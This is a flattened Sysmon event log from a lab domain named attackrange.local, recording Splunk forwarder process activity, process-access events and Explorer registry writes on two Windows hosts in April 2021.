11 ; 1606979 ; win-host-5.attackrange.local ; 2021-04-21 19:19:18.227 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; 2021-04-19 13:21:25.072
23542300x80000000000000001606978Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:18.227{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26D8E72483662DF8F62527298A6CF3AB,SHA256=4FDD28ED7A1BD932801D330A2FCD287766F66C950E077C96777408B2AF0107B0falsefalse - insufficient disk space 11241100x80000000000000001606977Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:18.158{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606976Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:18.158{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=041A5577B0452234CA41A4E74BF69C3D,SHA256=9B4597F0DBB271B33C107A35463A82674FCC8EDE9CD717B3EA78F117069CF603falsefalse - insufficient disk space 10341000x80000000000000001095474Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.749{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095473Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095472Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095471Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095470Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095469Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:19.747{761B69BB-818A-607D-0500-00000000BA01}4083000C:\Windows\system32\csrss.exe{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095468Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.747{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095467Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.746{761B69BB-7AB7-6080-A05F-00000000BA01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001095466Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095465Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001095464Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.224{761B69BB-7AB7-6080-9F5F-00000000BA01}71565872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095463Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.202{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=186BEB4D1196EE7790CD63B3487D479D,SHA256=EC3CFD63D62DE6B133AC31D35BA7B63C14882DE02B8A5E6768579B18E95B52FC,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001606986Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:19.562{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000} 12241200x80000000000000001606985Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
19:19:19.562{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000} 12241200x80000000000000001606984Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:19.562{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000} 534500x80000000000000001606983Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:19.309{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exe 11241100x80000000000000001606982Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:19.230{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606981Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:19.230{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25F85BA4B05A245CF1CB1E9445F29B18,SHA256=7C0F95CEC408B1D31237AEB6BD3688D37DEA2EC60A39FD72835D7729560DA584falsefalse - insufficient disk space 10341000x80000000000000001095462Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.085{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095461Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.083{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095460Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:19.083{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095459Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.083{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095458Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:19.082{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095457Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.082{761B69BB-818A-607D-0500-00000000BA01}4083000C:\Windows\system32\csrss.exe{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095456Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.082{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095455Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:19.081{761B69BB-7AB7-6080-9F5F-00000000BA01}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000001607061Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001607060Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 
13241300x80000000000000001607059Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001607058Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.765{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001607057Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedStateBinary Data 12241200x80000000000000001607056Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane 13241300x80000000000000001607055Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane\ExpandedStateBinary Data 12241200x80000000000000001607054Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane 13241300x80000000000000001607053Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInnerBinary Data 12241200x80000000000000001607052Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner 13241300x80000000000000001607051Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInnerBinary Data 12241200x80000000000000001607050Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.749{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner 12241200x80000000000000001607049Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:20.517{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\5 
